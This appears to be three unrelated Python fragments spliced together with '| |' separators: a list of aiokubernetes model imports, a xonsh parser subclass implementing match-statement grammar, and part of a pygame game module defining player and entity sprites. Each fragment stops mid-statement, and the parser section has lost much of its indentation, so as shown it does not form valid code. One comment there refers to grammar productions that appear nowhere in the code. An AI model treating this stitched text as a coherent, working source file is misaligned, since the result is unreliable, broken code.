from aiokubernetes.models.v1_resource_quota_spec import V1ResourceQuotaSpec
from aiokubernetes.models.v1_resource_quota_status import V1ResourceQuotaStatus
from aiokubernetes.models.v1_resource_requirements import V1ResourceRequirements
from aiokubernetes.models.v1_resource_rule import V1ResourceRule
from aiokubernetes.models.v1_role import V1Role
from aiokubernetes.models.v1_role_binding import V1RoleBinding
from aiokubernetes.models.v1_role_binding_list import V1RoleBindingList
from aiokubernetes.models.v1_role_list import V1RoleList
from aiokubernetes.models.v1_role_ref import V1RoleRef
from aiokubernetes.models.v1_rolling_update_daemon_set import V1RollingUpdateDaemonSet
from aiokubernetes.models.v1_rolling_update_deployment import V1RollingUpdateDeployment
from aiokubernetes.models.v1_rolling_update_stateful_set_strategy import V1RollingUpdateStatefulSetStrategy
from aiokubernetes.models.v1_se_linux_options import V1SELinuxOptions
from aiokubernetes.models.v1_scale import V1Scale
from aiokubernetes.models.v1_scale_io_persistent_volume_source import V1ScaleIOPersistentVolumeSource
from aiokubernetes.models.v1_scale_io_volume_source import V1ScaleIOVolumeSource
from aiokubernetes.models.v1_scale_spec import V1ScaleSpec
from aiokubernetes.models.v1_scale_status import V1ScaleStatus
from aiokubernetes.models.v1_secret import V1Secret
from aiokubernetes.models.v1_secret_env_source import V1SecretEnvSource
from aiokubernetes.models.v1_secret_key_selector import V1SecretKeySelector
from aiokubernetes.models.v1_secret_list import V1SecretList
from aiokubernetes.models.v1_secret_projection import V1SecretProjection
from aiokubernetes.models.v1_secret_reference import V1SecretReference
from aiokubernetes.models.v1_secret_volume_source import V1SecretVolumeSource
from aiokubernetes.models.v1_security_context import V1SecurityContext
from aiokubernetes.models.v1_self_subject_access_review import V1SelfSubjectAccessReview
from aiokubernetes.models.v1_self_subject_access_review_spec import V1SelfSubjectAccessReviewSpec
from aiokubernetes.models.v1_self_subject_rules_review import V1SelfSubjectRulesReview
from aiokubernetes.models.v1_self_subject_rules_review_spec import V1SelfSubjectRulesReviewSpec
from aiokubernetes.models.v1_server_address_by_client_cidr import V1ServerAddressByClientCIDR
from aiokubernetes.models.v1_service import V1Service
from aiokubernetes.models.v1_service_account import V1ServiceAccount
from aiokubernetes.models.v1_service_account_list import V1ServiceAccountList
from aiokubernetes.models.v1_service_list import V1ServiceList
from aiokubernetes.models.v1_service_port import V1ServicePort
from aiokubernetes.models.v1_service_reference import V1ServiceReference
from aiokubernetes.models.v1_service_spec import V1ServiceSpec
from aiokubernetes.models.v1_service_status import V1ServiceStatus
from aiokubernetes.models.v1_session_affinity_config import V1SessionAffinityConfig
from aiokubernetes.models.v1_stateful_set import V1StatefulSet
from aiokubernetes.models.v1_stateful_set_condition import V1StatefulSetCondition
from aiokubernetes.models.v1_stateful_set_list import V1StatefulSetList
from aiokubernetes.models.v1_stateful_set_spec import V1StatefulSetSpec
from aiokubernetes.models.v1_stateful_set_status import V1StatefulSetStatus
from aiokubernetes.models.v1_stateful_set_update_strategy import V1StatefulSetUpdateStrategy
from aiokubernetes.models.v1_status import V1Status
from aiokubernetes.models.v1_status_cause import V1StatusCause
from aiokubernetes.models.v1_status_details import V1StatusDetails
from aiokubernetes.models.v1_storage_class import V1StorageClass
from aiokubernetes.models.v1_storage_class_list import V1StorageClassList
from aiokubernetes.models.v1_storage_os_persistent_volume_source import V1StorageOSPersistentVolumeSource
from aiokubernetes.models.v1_storage_os_volume_source import V1StorageOSVolumeSource
from aiokubernetes.models.v1_subject import V1Subject
from aiokubernetes.models.v1_subject_access_review import V1SubjectAccessReview
from aiokubernetes.models.v1_subject_access_review_spec import V1SubjectAccessReviewSpec
from aiokubernetes.models.v1_subject_access_review_status import V1SubjectAccessReviewStatus
from aiokubernetes.models.v1_subject_rules_review_status import V1SubjectRulesReviewStatus
from aiokubernetes.models.v1_tcp_socket_action import V1TCPSocketAction
from aiokubernetes.models.v1_taint import V1Taint
from aiokubernetes.models.v1_token_review import V1TokenReview
from aiokubernetes.models.v1_token_review_spec import V1TokenReviewSpec
from aiokubernetes.models.v1_token_review_status import V1TokenReviewStatus
from aiokubernetes.models.v1_toleration import V1Toleration
from aiokubernetes.models.v1_user_info import V1UserInfo
from aiokubernetes.models.v1_volume import V1Volume
from aiokubernetes.models.v1_volume_device import V1VolumeDevice
from aiokubernetes.models.v1_volume_mount import V1VolumeMount
from aiokubernetes.models.v1_volume_node_affinity import V1VolumeNodeAffinity
from aiokubernetes.models.v1_volume_projection import V1VolumeProjection
from aiokubernetes.models.v1_vsphere_virtual_disk_volume_source import V1VsphereVirtualDiskVolumeSource
from aiokubernetes.models.v1_watch_event import V1WatchEvent
from aiokubernetes.models.v1_weighted_pod_affinity_term import V1WeightedPodAffinityTerm
from aiokubernetes.models.v1alpha1_aggregation_rule import V1alpha1AggregationRule
from aiokubernetes.models.v1alpha1_cluster_role import V1alpha1ClusterRole
from aiokubernetes.models.v1alpha1_cluster_role_binding import V1alpha1ClusterRoleBinding
from aiokubernetes.models.v1alpha1_cluster_role_binding_list import V1alpha1ClusterRoleBindingList
from aiokubernetes.models.v1alpha1_cluster_role_list import V1alpha1ClusterRoleList
from aiokubernetes.models.v1alpha1_initializer import V1alpha1Initializer
from aiokubernetes.models.v1alpha1_initializer_configuration import V1alpha1InitializerConfiguration
from aiokubernetes.models.v1alpha1_initializer_configuration_list import V1alpha1InitializerConfigurationList
from aiokubernetes.models.v1alpha1_pod_preset import V1alpha1PodPreset
from aiokubernetes.models.v1alpha1_pod_preset_list import V1alpha1PodPresetList
from aiokubernetes.models.v1alpha1_pod_preset_spec import V1alpha1PodPresetSpec
from aiokubernetes.models.v1alpha1_policy_rule import V1alpha1PolicyRule
from aiokubernetes.models.v1alpha1_priority_class import V1alpha1PriorityClass
from aiokubernetes.models.v1alpha1_priority_class_list import V1alpha1PriorityClassList
from aiokubernetes.models.v1alpha1_role import V1alpha1Role
from aiokubernetes.models.v1alpha1_role_binding import V1alpha1RoleBinding
from aiokubernetes.models.v1alpha1_role_binding_list import V1alpha1RoleBindingList
from aiokubernetes.models.v1alpha1_role_list import V1alpha1RoleList
from aiokubernetes.models.v1alpha1_role_ref import V1alpha1RoleRef
from aiokubernetes.models.v1alpha1_rule import V1alpha1Rule
from aiokubernetes.models.v1alpha1_subject import V1alpha1Subject
from aiokubernetes.models.v1alpha1_volume_attachment import V1alpha1VolumeAttachment
from aiokubernetes.models.v1alpha1_volume_attachment_list import V1alpha1VolumeAttachmentList
from aiokubernetes.models.v1alpha1_volume_attachment_source import V1alpha1VolumeAttachmentSource
from aiokubernetes.models.v1alpha1_volume_attachment_spec import V1alpha1VolumeAttachmentSpec
from aiokubernetes.models.v1alpha1_volume_attachment_status import V1alpha1VolumeAttachmentStatus
from aiokubernetes.models.v1alpha1_volume_error import V1alpha1VolumeError
from aiokubernetes.models.v1beta1_api_service import V1beta1APIService
from aiokubernetes.models.v1beta1_api_service_condition import V1beta1APIServiceCondition
from aiokubernetes.models.v1beta1_api_service_list import V1beta1APIServiceList
from aiokubernetes.models.v1beta1_api_service_spec import V1beta1APIServiceSpec
from aiokubernetes.models.v1beta1_api_service_status import V1beta1APIServiceStatus
from aiokubernetes.models.v1beta1_aggregation_rule import V1beta1AggregationRule
from aiokubernetes.models.v1beta1_certificate_signing_request import V1beta1CertificateSigningRequest
from aiokubernetes.models.v1beta1_certificate_signing_request_condition import V1beta1CertificateSigningRequestCondition
from aiokubernetes.models.v1beta1_certificate_signing_request_list import V1beta1CertificateSigningRequestList
from aiokubernetes.models.v1beta1_certificate_signing_request_spec import V1beta1CertificateSigningRequestSpec
from aiokubernetes.models.v1beta1_certificate_signing_request_status import V1beta1CertificateSigningRequestStatus
from aiokubernetes.models.v1beta1_cluster_role import V1beta1ClusterRole
from aiokubernetes.models.v1beta1_cluster_role_binding import V1beta1ClusterRoleBinding
from aiokubernetes.models.v1beta1_cluster_role_binding_list import V1beta1ClusterRoleBindingList
from aiokubernetes.models.v1beta1_cluster_role_list import V1beta1ClusterRoleList
from aiokubernetes.models.v1beta1_controller_revision import V1beta1ControllerRevision
from aiokubernetes.models.v1beta1_controller_revision_list import V1beta1ControllerRevisionList
from aiokubernetes.models.v1beta1_cron_job import V1beta1CronJob
from aiokubernetes.models.v1beta1_cron_job_list import V1beta1CronJobList
from aiokubernetes.models.v1beta1_cron_job_spec import V1beta1CronJobSpec
from aiokubernetes.models.v1beta1_cron_job_status import V1beta1CronJobStatus
from aiokubernetes.models.v1beta1_custom_resource_definition import V1beta1CustomResourceDefinition
from aiokubernetes.models.v1beta1_custom_resource_definition_condition import V1beta1CustomResourceDefinitionCondition
from aiokubernetes.models.v1beta1_custom_resource_definition_list import V1beta1CustomResourceDefinitionList
from aiokubernetes.models.v1beta1_custom_resource_definition_names import V1beta1CustomResourceDefinitionNames
from aiokubernetes.models.v1beta1_custom_resource_definition_spec import V1beta1CustomResourceDefinitionSpec
from aiokubernetes.models.v1beta1_custom_resource_definition_status import V1beta1CustomResourceDefinitionStatus
from aiokubernetes.models.v1beta1_custom_resource_subresource_scale import V1beta1CustomResourceSubresourceScale
from aiokubernetes.models.v1beta1_custom_resource_subresources import V1beta1CustomResourceSubresources
from aiokubernetes.models.v1beta1_custom_resource_validation import V1beta1CustomResourceValidation
from aiokubernetes.models.v1beta1_daemon_set import V1beta1DaemonSet
from aiokubernetes.models.v1beta1_daemon_set_condition import V1beta1DaemonSetCondition
from aiokubernetes.models.v1beta1_daemon_set_list import V1beta1DaemonSetList
from aiokubernetes.models.v1beta1_daemon_set_spec import V1beta1DaemonSetSpec
from aiokubernetes.models.v1beta1_daemon_set_status import V1beta1DaemonSetStatus
from aiokubernetes.models.v1beta1_daemon_set_update_strategy import V1beta1DaemonSetUpdateStrategy
from aiokubernetes.models.v1beta1_event import V1beta1Event
from aiokubernetes.models.v1beta1_event_list import V1beta1EventList
from aiokubernetes.models.v1beta1_event_series import V1beta1EventSeries
from aiokubernetes.models.v1beta1_eviction import V1beta1Eviction
from aiokubernetes.models.v1beta1_external_documentation import V1beta1ExternalDocumentation
from aiokubernetes.models.v1beta1_http_ingress_path import V1beta1HTTPIngressPath
from aiokubernetes.models.v1beta1_http_ingress_rule_value import V1beta1HTTPIngressRuleValue
from aiokubernetes.models.v1beta1_ip_block import V1beta1IPBlock
from aiokubernetes.models.v1beta1_ingress import V1beta1Ingress
from aiokubernetes.models.v1beta1_ingress_backend import V1beta1IngressBackend
from aiokubernetes.models.v1beta1_ingress_list import V1beta1IngressList
from aiokubernetes.models.v1beta1_ingress_rule import V1beta1IngressRule
from aiokubernetes.models.v1beta1_ingress_spec import V1beta1IngressSpec
from aiokubernetes.models.v1beta1_ingress_status import V1beta1IngressStatus
from aiokubernetes.models.v1beta1_ingress_tls import V1beta1IngressTLS
from aiokubernetes.models.v1beta1_json import V1beta1JSON
from aiokubernetes.models.v1beta1_json_schema_props import V1beta1JSONSchemaProps
from aiokubernetes.models.v1beta1_json_schema_props_or_array import V1beta1JSONSchemaPropsOrArray
from aiokubernetes.models.v1beta1_json_schema_props_or_bool import V1beta1JSONSchemaPropsOrBool
from aiokubernetes.models.v1beta1_json_schema_props_or_string_array import V1beta1JSONSchemaPropsOrStringArray
from aiokubernetes.models.v1beta1_job_template_spec import V1beta1JobTemplateSpec
from aiokubernetes.models.v1beta1_local_subject_access_review import V1beta1LocalSubjectAccessReview
from aiokubernetes.models.v1beta1_mutating_webhook_configuration import V1beta1MutatingWebhookConfiguration
from aiokubernetes.models.v1beta1_mutating_webhook_configuration_list import V1beta1MutatingWebhookConfigurationList
from aiokubernetes.models.v1beta1_network_policy import V1beta1NetworkPolicy
from aiokubernetes.models.v1beta1_network_policy_egress_rule import V1beta1NetworkPolicyEgressRule
from aiokubernetes.models.v1beta1_network_policy_ingress_rule import V1beta1NetworkPolicyIngressRule
from aiokubernetes.models.v1beta1_network_policy_list import V1beta1NetworkPolicyList
from aiokubernetes.models.v1beta1_network_policy_peer import V1beta1NetworkPolicyPeer
from aiokubernetes.models.v1beta1_network_policy_port import V1beta1NetworkPolicyPort
from aiokubernetes.models.v1beta1_network_policy_spec import V1beta1NetworkPolicySpec
from aiokubernetes.models.v1beta1_non_resource_attributes import V1beta1NonResourceAttributes
from aiokubernetes.models.v1beta1_non_resource_rule import | |
# type: ignore
# TODO: remove line above once mypy understands the match statement
"""Handles changes since PY310
handle
- import-alias requiring lineno
- match statement
"""
import ast
from xonsh.parsers.v39 import Parser as ThreeNineParser
from xonsh.ply.ply import yacc
class Parser(ThreeNineParser):
def p_import_from_post_times(self, p):
"""import_from_post : TIMES"""
p[0] = [ast.alias(name=p[1], asname=None, **self.get_line_cols(p, 1))]
    def p_import_as_name(self, p):
        """import_as_name : name_str as_name_opt"""
        # Same production shape as dotted_as_name (name + optional alias), so
        # reuse that action to build the ast.alias node.
        self.p_dotted_as_name(p)
def p_dotted_as_name(self, p: yacc.YaccProduction):
"""dotted_as_name : dotted_name as_name_opt"""
alias_idx = 2
p[0] = ast.alias(
name=p[1], asname=p[alias_idx], **self.get_line_cols(p, alias_idx)
)
@staticmethod
def get_line_cols(p: yacc.YaccProduction, idx: int):
line_no, end_line_no = p.linespan(idx)
col_offset, end_col_offset = p.lexspan(idx)
return dict(
lineno=line_no,
end_lineno=end_line_no,
col_offset=col_offset,
end_col_offset=end_col_offset,
)
def _set_error_at_production_index(self, msg, p, i):
error_loc = self.get_line_cols(p, i)
err_lineno = error_loc["lineno"]
err_column = error_loc["col_offset"] + 1
self._set_error(msg, self.currloc(lineno=err_lineno, column=err_column))
    def p_compound_stmt_match(self, p):
        """
        compound_stmt : match_stmt
        """
        # The docstring above is the PLY grammar rule: a match statement is a
        # compound statement.  Pass the statement list through unchanged.
        p[0] = p[1]
def p_match_stmt(self, p):
"""
match_stmt : match_tok subject_expr COLON NEWLINE INDENT case_block_list_nonempty DEDENT
"""
_, _, subject_expr, _, _, _, case_block_list_nonempty, _ = p
p[0] = [
ast.Match(
**self.get_line_cols(p, 1),
subject=subject_expr,
cases=case_block_list_nonempty,
)
]
# case blocks
def p_case_block(self, p):
"""
case_block : case_tok patterns COLON suite
| case_tok patterns IF test COLON suite
"""
loc = self.get_line_cols(p, 1)
match list(p):
case [_, _, pattern, _, suite]:
p[0] = ast.match_case(pattern=pattern, body=suite, **loc)
case [_, _, pattern, _, guard, _, suite]:
p[0] = ast.match_case(pattern=pattern, body=suite, guard=guard, **loc)
case _:
raise AssertionError()
def p_case_block_list_nonempty(self, p):
"""
case_block_list_nonempty : case_block
| case_block case_block_list_nonempty
"""
match list(p):
case [_, case_block]:
p[0] = [case_block]
case [_, case_block, case_block_list_nonempty]:
p[0] = [case_block] + case_block_list_nonempty
case _:
raise AssertionError()
# subject expression
def p_subject_expr_single_value(self, p):
"""
subject_expr : test_or_star_expr comma_opt
"""
match list(p):
case [_, test_or_star_expr, None]:
# single value
p[0] = test_or_star_expr
case [_, test_or_star_expr, ","]:
# tuple with one element
p[0] = ast.Tuple(
elts=[test_or_star_expr], ctx=ast.Load(), **self.get_line_cols(p, 1)
)
case _:
raise AssertionError()
def p_subject_expr_multiple_values(self, p):
"""
subject_expr : test_or_star_expr comma_test_or_star_expr_list comma_opt
"""
match list(p):
case [_, test_or_star_expr, comma_test_or_star_expr_list, "," | None]:
# tuple with more than one element
p[0] = ast.Tuple(
elts=[test_or_star_expr] + comma_test_or_star_expr_list,
ctx=ast.Load(),
**self.get_line_cols(p, 1),
)
case _:
raise AssertionError()
# patterns
    def p_closed_pattern(self, p):
        """
        closed_pattern : literal_pattern
                       | capture_and_wildcard_pattern
                       | group_pattern
                       | sequence_pattern
                       | value_pattern
                       | class_pattern
                       | mapping_pattern
        """
        # The docstring above is the PLY grammar rule for this production.
        # productions from closed_pattern to regex_pattern and safe_transform_pattern are located below
        # Each alternative already produced a finished ast pattern node.
        p[0] = p[1]
    def p_patterns(self, p):
        """
        patterns : pattern
                 | open_sequence_pattern
        """
        # Either alternative already yields a finished ast pattern node.
        p[0] = p[1]
    def p_pattern(self, p):
        """
        pattern : or_pattern
                | as_pattern
        """
        # Both alternatives build their own ast node; pass it up unchanged.
        p[0] = p[1]
def p_or_pattern(self, p):
"""
or_pattern : or_pattern_list
"""
_, or_pattern_list = p
match or_pattern_list:
case [single_value]:
p[0] = single_value
case multiple_values:
p[0] = ast.MatchOr(patterns=multiple_values, **self.get_line_cols(p, 1))
def p_or_pattern_list(self, p):
"""
or_pattern_list : closed_pattern
| closed_pattern PIPE or_pattern_list
"""
match list(p):
case [_, closed_pattern]:
p[0] = [closed_pattern]
case [_, closed_pattern, "|", or_pattern_list]:
p[0] = [closed_pattern] + or_pattern_list
# group pattern
def p_group_pattern(self, p):
"""
group_pattern : LPAREN pattern RPAREN
"""
_, _, pattern, _ = p
p[0] = pattern
# literal pattern
def p_literal_pattern(self, p):
"""
literal_pattern : literal_expr
"""
match p[1]:
case None | True | False:
p[0] = ast.MatchSingleton(value=p[1], **self.get_line_cols(p, 1))
case _:
p[0] = ast.MatchValue(value=p[1], **self.get_line_cols(p, 1))
def p_literal_expr_number_or_string_literal_list(self, p):
"""
literal_expr : complex_number
| string_literal_list
"""
p[0] = p[1]
match p[1]:
case ast.JoinedStr():
raise AssertionError("patterns may not match formatted string literals")
# TODO: raise SyntaxError instead
# (doing so currently somehow causes an IndexError in tools.py:get_logical_line)
# TODO: f"hi" "hi" does not parse in xonsh
def p_literal_expr_none_or_true_or_false(self, p):
"""
literal_expr : none_tok
| true_tok
| false_tok
"""
match p[1].value:
case "None":
value = None
case "True":
value = True
case "False":
value = False
case _:
raise AssertionError()
p[0] = value
    def p_complex_number(self, p):
        """
        complex_number : number
                       | MINUS number
                       | number PLUS number
                       | number MINUS number
                       | MINUS number PLUS number
                       | MINUS number MINUS number
        """
        # Builds the AST for (possibly negated) numeric literals of the
        # forms ``a``, ``-a``, ``a+bj``, ``a-bj``, ``-a+bj``, ``-a-bj``.
        ops = {"+": ast.Add(), "-": ast.Sub()}
        build_complex = False
        loc = self.get_line_cols(p, 1)
        match list(p):
            case [_, x]:
                # Plain number: pass the node through.
                p[0] = x
            case [_, "-", x]:
                # Negated number: wrap in unary minus.
                p[0] = ast.UnaryOp(op=ast.USub(), operand=x, **loc)
            case [_, left, ("+" | "-") as op_char, right]:
                # real +/- imaginary
                build_complex = True
                negate_left_side = False
            case [_, "-", left, ("+" | "-") as op_char, right]:
                # -real +/- imaginary
                build_complex = True
                negate_left_side = True
            case _:
                raise AssertionError()
        if build_complex:
            # TODO raise syntax error instead (see reason in p_literal_expr_number_or_string_literal_list)
            # ``right`` presumably is an ast.Constant; its .value must be an
            # imaginary (complex) literal for ``a+bj`` to be well-formed.
            assert isinstance(
                right.value, complex
            ), "right part of complex literal must be imaginary"
            if negate_left_side:
                left = ast.UnaryOp(op=ast.USub(), operand=left, **loc)
            p[0] = ast.BinOp(left=left, op=ops[op_char], right=right, **loc)
# capture- and wildcard-pattern
def p_as_pattern(self, p):
"""
as_pattern : or_pattern AS capture_target_name
"""
_, or_pattern, _, name = p
p[0] = ast.MatchAs(pattern=or_pattern, name=name, **self.get_line_cols(p, 1))
def p_capture_target_name(self, p):
"""
capture_target_name : name_str
"""
name = p[1]
if name == "_":
self._set_error_at_production_index(
"can't capture name '_' in patterns", p, 1
)
p[0] = name
def p_capture_and_wildcard_pattern(self, p):
"""
capture_and_wildcard_pattern : name_str
"""
# TODO: according to the spec we would need the negative lookahead !('.' | '(' | '=')
# (also in p_star_pattern, p_value_pattern)
# but parsing seems to work just fine
_, name = p
target = name if name != "_" else None
p[0] = ast.MatchAs(name=target, **self.get_line_cols(p, 1))
# sequence pattern
    def p_sequence_pattern_square_brackets(self, p):
        """
        sequence_pattern : LBRACKET maybe_sequence_pattern RBRACKET
                         | LBRACKET RBRACKET
                         | LPAREN open_sequence_pattern RPAREN
                         | LPAREN RPAREN
        """
        # Builds an ast.MatchSequence for bracketed/parenthesised patterns.
        match list(p):
            case [_, _, ast.MatchSequence() as seq, _]:
                # The inner production already produced a sequence node.
                # NOTE(review): this branch also fires when a *single*
                # element is itself a sequence pattern (e.g. ``[[1, 2]]``),
                # which then is not wrapped a second time — confirm that
                # nested single-element sequence patterns parse as intended.
                p[0] = seq
            case [_, _, single_item, _]:
                # One bare element: wrap it into a one-element sequence.
                p[0] = ast.MatchSequence(
                    patterns=[single_item], **self.get_line_cols(p, 1)
                )
            case [_, _, _]:
                # Empty brackets/parens -> empty sequence pattern.
                p[0] = ast.MatchSequence(patterns=[], **self.get_line_cols(p, 1))
            case _:
                raise AssertionError()
    def p_maybe_sequence_pattern(self, p):
        """
        maybe_sequence_pattern : maybe_star_pattern comma_opt
                               | maybe_star_pattern COMMA maybe_sequence_pattern
        """
        # Folds a comma-separated chain of sequence elements into a single
        # ast.MatchSequence, or passes a lone element through unchanged.
        match list(p):
            case [_, maybe_star_pattern, ","]:
                # Single element with trailing comma -> one-element sequence.
                p[0] = ast.MatchSequence(
                    patterns=[maybe_star_pattern], **self.get_line_cols(p, 1)
                )
            case [_, maybe_star_pattern, None]:
                # Single element without comma -> not a sequence; pass through.
                p[0] = maybe_star_pattern
            case [
                _,
                maybe_star_pattern,
                ",",
                ast.MatchSequence(patterns=list(maybe_sequence_pattern)),
            ]:
                # Head element plus an already-built sequence tail: flatten.
                p[0] = ast.MatchSequence(
                    patterns=[maybe_star_pattern] + maybe_sequence_pattern,
                    **self.get_line_cols(p, 1),
                )
            case [_, maybe_star_pattern, ",", maybe_sequence_pattern]:
                # Head element plus a single (non-sequence) tail element.
                p[0] = ast.MatchSequence(
                    patterns=[maybe_star_pattern, maybe_sequence_pattern],
                    **self.get_line_cols(p, 1),
                )
            case _:
                raise AssertionError()
    def p_open_sequence_pattern(self, p):
        """
        open_sequence_pattern : maybe_star_pattern COMMA
                              | maybe_star_pattern COMMA maybe_sequence_pattern
        """
        # Same production shapes as maybe_sequence_pattern (unbracketed
        # ``a, b, ...`` form), so reuse its handler.
        self.p_maybe_sequence_pattern(p)
    def p_maybe_star_pattern(self, p):
        """
        maybe_star_pattern : pattern
                           | star_pattern
        """
        # A sequence element is either a normal pattern or ``*rest``.
        p[0] = p[1]
def p_star_pattern(self, p):
"""
star_pattern : TIMES name_str
"""
_, _, name = p
target = name if name != "_" else None
p[0] = ast.MatchStar(name=target, **self.get_line_cols(p, 1))
def p_value_pattern(self, p):
"""
value_pattern : attr_name_with
"""
p[0] = ast.MatchValue(value=p[1], **self.get_line_cols(p, 1))
    # This is implemented via this 'chain' grammar since implementing the grammar from the spec verbatim leads to bad parser states (regarding comma tokens)
def p_class_pattern(self, p):
"""
class_pattern : attr_name LPAREN class_pattern_positional_part_start RPAREN
"""
positional_patterns, keyword_patterns_key_value_tuple_list = p[3]
if keyword_patterns_key_value_tuple_list:
# transpose, e.g. [ (a, 1), (b, 2) ] to [a, b], [1, 2]
kwd_attrs, kwd_patterns = list(zip(*keyword_patterns_key_value_tuple_list))
else:
kwd_attrs, kwd_patterns = [], []
p[0] = ast.MatchClass(
cls=p[1],
patterns=positional_patterns,
kwd_attrs=list(kwd_attrs),
kwd_patterns=list(kwd_patterns),
**self.get_line_cols(p, 1),
)
# returns ( [pattern], [ (name, pattern) ] )
    def p_class_pattern_positional_part_start(self, p):
        """
        class_pattern_positional_part_start :
                                            | pattern
                                            | pattern COMMA class_pattern_positional_part
                                            | name_str EQUALS pattern
                                            | name_str EQUALS pattern COMMA class_pattern_keyword_part
        """
        # Returns ( [positional pattern], [ (name, pattern) ] ).
        match list(p):
            case [_]:
                # Empty argument list.
                p[0] = ([], [])
            case [_, pattern]:
                # Single positional pattern.
                p[0] = ([pattern], [])
            case [_, pattern, ",", (names, patterns)]:
                # Positional pattern followed by the rest of the chain.
                p[0] = ([pattern] + names, patterns)
            case [_, name, "=", pattern]:
                # Single keyword pattern.
                p[0] = ([], [(name, pattern)])
            case [_, name, "=", pattern, ",", class_pattern_keyword_part]:
                # Keyword pattern followed by more keyword patterns.
                p[0] = ([], [(name, pattern)] + class_pattern_keyword_part)
            case _:
                raise AssertionError()
# returns ( [pattern], [ (name, pattern) ] )
    def p_class_pattern_positional_part_skip(self, p):
        """
        class_pattern_positional_part : class_pattern_keyword_part
        """
        # No positional patterns remain; wrap the keyword part as
        # ( positional=[], keyword=[(name, pattern), ...] ).
        p[0] = ([], p[1])
# returns ( [pattern], [ (name, pattern) ] )
def p_class_pattern_positional_part(self, p):
"""
class_pattern_positional_part : pattern
| pattern COMMA class_pattern_positional_part
"""
match list(p):
case [_, pattern]:
p[0] = ([pattern], [])
case [_, pattern, ",", (names, patterns)]:
p[0] = ([pattern] + names, patterns)
case _:
raise AssertionError()
# returns [ (name, pattern) ]
def p_class_pattern_keyword_part(self, p):
"""
class_pattern_keyword_part :
| COMMA
| name_str EQUALS pattern
| name_str EQUALS pattern COMMA class_pattern_keyword_part
"""
match list(p):
case [_] | | |
<gh_stars>0
import math
import os.path
import random
import time
from abc import ABC

# Explicit top-level pygame import: the module references pygame.sprite,
# pygame.Surface, pygame.key, pygame.time, etc., which the submodule
# star-imports below do not guarantee to provide.
import pygame
from pygame.locals import *
from pygame.math import Vector2

from projectSS.spritesheet import *
# Abstract entity class
class Entity(pygame.sprite.Sprite, ABC):
    """Abstract base class for all gameplay sprites.

    Keeps a world-space position (``pos``) plus two rects: ``rect`` for
    collision in world coordinates and ``rect_render`` for drawing, offset
    by the gameplay screen's camera scroll.
    """

    def __init__(self, gameplay_screen, *groups):
        super().__init__(groups)
        self.gameplay_screen = gameplay_screen
        self.game = gameplay_screen.game
        # Placeholder surface; subclasses assign their real image.
        self.surf = pygame.Surface((0, 0))
        self.rect = self.surf.get_rect()
        self.rect_render = self.surf.get_rect()
        # World-space position. NOTE(review): last_pos is bound to the
        # same Vector2 object as pos here; if an independent snapshot is
        # intended, this would need Vector2(self.pos) — confirm against
        # how subclasses update last_pos.
        self.pos = Vector2(0, 0)
        self.last_pos = self.pos

    def update(self):
        # Remove the sprite once it falls below the despawn line.
        if self.pos.y > self.gameplay_screen.despawn_y:
            self.kill()
        self.update_rect()

    def update_rect(self):
        """Sync the collision and render rects with the current position."""
        self.rect = self.surf.get_rect(center=self.pos)
        self.rect_render = self.surf.get_rect(
            center=(self.pos.x, self.pos.y - self.gameplay_screen.camera_y))

    def render(self):
        """Draw the sprite at its camera-adjusted screen position."""
        self.game.screen.blit(self.surf, self.rect_render)
# For now, player will be represented with red squares.
class Player(Entity):
    def __init__(self, gameplay_screen):
        """Create the player sprite and initialise physics/animation state."""
        super().__init__(gameplay_screen)
        # Uses the Spritesheet class to load and pick out the frame images.
        abs_dir = os.path.dirname(__file__)
        self.player_spritesheet = Spritesheet(os.path.join(abs_dir, 'assets/player_spritesheet.png'))
        # Animation state: which clip is playing and which frame is shown.
        self.play_walk = False
        self.play_jump = False
        self.current_frame = 0
        self.last_update = 0
        # Last horizontal facing: False = left, True = right.
        self.last_direction = False
        # To reduce clutter in __init__, all frame images are loaded in load_images().
        self.load_images()
        # surf holds the currently displayed frame (starts on idle-right)
        # and is swapped by the animation methods every frame.
        self.surf = self.idle_walk_frames_r[0]
        # Velocity and acceleration vectors.
        self.vel = Vector2(0, 0)
        self.acc = Vector2(0, 0)
        # Gameplay state flags.
        self.alive = True
        self.won = False
        self.hit = False
        self.on_ground = False
        self.jumping = False
        self.jumped = False
        self.pushed = False
        self.push_time = 0
        # Physics constants.
        self.ACCELERATION = 0.5
        self.FRICTION = 0.1
        self.AIR_FRICTION = 0.06
        self.GRAVITY = 0.5
        self.MAX_FALL_VELOCITY = 15
        # Power-up effects.
        self.boosted = False
        self.immune = False
    def load_images(self):
        """Slice every player animation frame out of the sprite sheet.

        get_image arguments are (x, y, width, height) in sheet pixels.
        The frame-order comments (I=idle, W=walk, J=jump, L/R=facing)
        document each list's layout; the animation methods index into
        these lists by position, so the order is load-bearing.
        """
        # Idle/walk frames, facing left and right.
        self.idle_walk_frames_l = [self.player_spritesheet.get_image(3, 3, 58, 58),
                                   self.player_spritesheet.get_image(2, 136, 56, 60)]
        self.idle_walk_frames_r = [self.player_spritesheet.get_image(137, 3, 58, 58),
                                   self.player_spritesheet.get_image(140, 136, 56, 60)]
        # Plain jump frames: [left, right].
        self.jump_frames = [self.player_spritesheet.get_image(2, 70, 64, 60),
                            self.player_spritesheet.get_image(134, 70, 64, 60)]
        # IL, IR, WL, WR, JL, JR
        self.rhythm_jump_frames = [self.player_spritesheet.get_image(68, 3, 58, 58),
                                   self.player_spritesheet.get_image(204, 3, 58, 58),
                                   self.player_spritesheet.get_image(67, 136, 56, 60),
                                   self.player_spritesheet.get_image(207, 136, 56, 60),
                                   self.player_spritesheet.get_image(66, 69, 64, 60),
                                   self.player_spritesheet.get_image(200, 70, 64, 60)]
        # Boost power-up frames: [left, right].
        self.player_boost_frames = [self.player_spritesheet.get_image(0, 198, 66, 66),
                                    self.player_spritesheet.get_image(66, 198, 66, 66)]
        # Invincible variants of the idle/walk/jump frames.
        self.invinc_idle_walk_frames_l = [self.player_spritesheet.get_image(0, 264, 66, 63),
                                          self.player_spritesheet.get_image(130, 198, 66, 65)]
        self.invinc_idle_walk_frames_r = [self.player_spritesheet.get_image(66, 264, 66, 63),
                                          self.player_spritesheet.get_image(196, 198, 66, 65)]
        self.invinc_jump_frames = [self.player_spritesheet.get_image(130, 264, 66, 66),
                                   self.player_spritesheet.get_image(196, 264, 66, 66)]
        # IL, WL, IR, WR, JL, JR  (note: different order than rhythm_jump_frames)
        self.invinc_rhythm_frames = [self.player_spritesheet.get_image(0, 396, 66, 63),
                                     self.player_spritesheet.get_image(130, 330, 66, 65),
                                     self.player_spritesheet.get_image(66, 396, 66, 63),
                                     self.player_spritesheet.get_image(196, 330, 66, 65),
